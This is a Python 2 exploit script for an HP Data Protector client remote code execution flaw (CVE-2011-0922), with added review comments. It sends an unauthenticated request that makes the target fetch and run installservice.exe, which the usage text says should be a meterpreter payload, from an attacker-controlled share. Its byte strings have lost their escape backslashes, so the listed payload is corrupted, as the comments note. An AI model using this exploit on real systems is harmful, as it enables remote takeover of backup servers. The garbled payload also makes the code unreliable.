
# Title : HP Data Protector Client EXEC_CMD Remote Code Execution
# Published : 2012-06-19
# Author :


#!/usr/bin/env python

# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-12-06
# Exploit Author: Ben Turner
# Vendor Homepage: www.hp.com
# Version: 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143


import socket
import sys
import binascii

# Proof-of-concept for CVE-2011-0922 (references in the file header). The
# script builds one request, sends it to the Data Protector client port and
# echoes whatever the peer answers. It performs no authentication exchange
# before sending.
#
# Python 2 syntax throughout (print statements). The "33[" fragments in the
# strings below are ANSI colour escapes whose leading backslash ("\033") was
# lost in this copy, so as written they print literally.
if len(sys.argv) != 4:
    print ""
    print "33[0;31mUsage: ./hp_protector.py <Target IP> <Port> <Reverse IP> 33[0m" 
    print ""
    print "33[0;32mMake sure you create a meterpreter payload and a share with the following \\<Reverse IP>\Omniback\i386\installservice.exe33[0m" 
    print "33[0;32mAlso make sure the SYSTEM account on windows can access your share, this is not always trivial33[0m"
    print ""
    sys.exit(1)
host = sys.argv[1]       # target Data Protector client
port = int(sys.argv[2])  # raises ValueError on a non-numeric port
lhost = sys.argv[3]      # address the target is told to read the share from

# Prerequisites restated from the usage text above: a share reachable as
# \\<Reverse IP>\Omniback\i386\installservice.exe that the target's SYSTEM
# account can read (the path separators in the original comment line were
# lost in this copy).
#
# Defender note: the observable side effect is the target fetching an
# executable from a remote UNC path, presumably over SMB, so egress SMB from
# backup clients to untrusted addresses is the practical control in addition
# to the vendor fix referenced in the header.


# b is lhost with the three-character text "x00" placed before every
# character. NOTE(review): the backslash of what was presumably "\x00" is
# missing, so as written this builds plain ASCII, not the wide-character form
# the surrounding literals suggest.
b = ''

for char in lhost:
	a = "x00"+char
	b = b + a

# (a commented-out debug print of b stood here)


# The request body. Every "xNN" token below has the same missing-backslash
# problem, so this listing does not reproduce the original byte stream; only
# its structure is visible: a fixed prefix, lhost spliced in at several points
# (the "+ b +" joins), and text that, read as wide characters, repeats the
# account context and the UNC path already described in the usage message.
payload = ("x00x00x01xbexffxfex32x00x00x00x20"
+ b + 
"x00x00x00x20x00x30x00"
"x00x00x20x00x53x00x59x00x53x00x54x00x45x00x4dx00"
"x00x00x20x00x4ex00x54x00x20x00x41x00x55x00x54x00"
"x48x00x4fx00x52x00x49x00x54x00x59x00x00x00x20x00"
"x43x00x00x00x20x00x32x00x36x00x00x00x20x00x5cx00"
"x5c"
+ b +
"x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00"
"x61x00x63x00x6bx00x5cx00x69x00x33x00x38x00x36x00"
"x5cx00x69x00x6ex00x73x00x74x00x61x00x6cx00x6cx00"
"x73x00x65x00x72x00x76x00x69x00x63x00x65x00x2ex00"
"x65x00x78x00x65x00x20x00x2dx00x73x00x6fx00x75x00"
"x72x00x63x00x65x00x20x4fx00x6dx00x6ex00x69x00x62"
"x00x61x00x63x00x6bx00x20x00x5cx00x5c"
+ b +
"x5cx00x5cx00x4fx00"
"x6dx00x6ex00x69x00x62x00x61x00x63x00x6bx00x5cx00"
"x69x00x33x00x38x00x36x00x5cx00x69x00x6ex00x73x00"
"x74x00x61x00x6cx00x6cx00x73x00x65x00x72x00x76x00"
"x69x00x63x00x65x00x2ex00x65x00x78x00x65x00x20x00"
"x2dx00x73x00x6fx00x75x00x72x00x63x00x65x00x20x00"
"x5cx00x5c"
+ b +
"x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00x61x00x63"
"x00x6bx00x20x00x00x00x00x00x00x00x02x54"
"xffxfex32x00x36x00x00x00x20x00x5bx00x30x00x5dx00"
"x41x00x44x00x44x00x2fx00x55x00x50x00x47x00x52x00"
"x41x00x44x00x45x00x0ax00x5cx00x5c"
+ b +
"x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00x61x00x63"
"x00x6bx00x5cx00x69x00x33x00x38x00x36x00")

print payload  # echoed to stdout before sending, for inspection

# Single TCP exchange: connect, send the request once, then print everything
# the peer returns until it closes the connection (empty recv). No timeout is
# set, so a peer that keeps the connection open stalls the script, and the
# socket is only closed on the normal path (no try/finally).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
while 1:
        data = s.recv(4096)
        if data:
                print data
        else:
                break
s.close()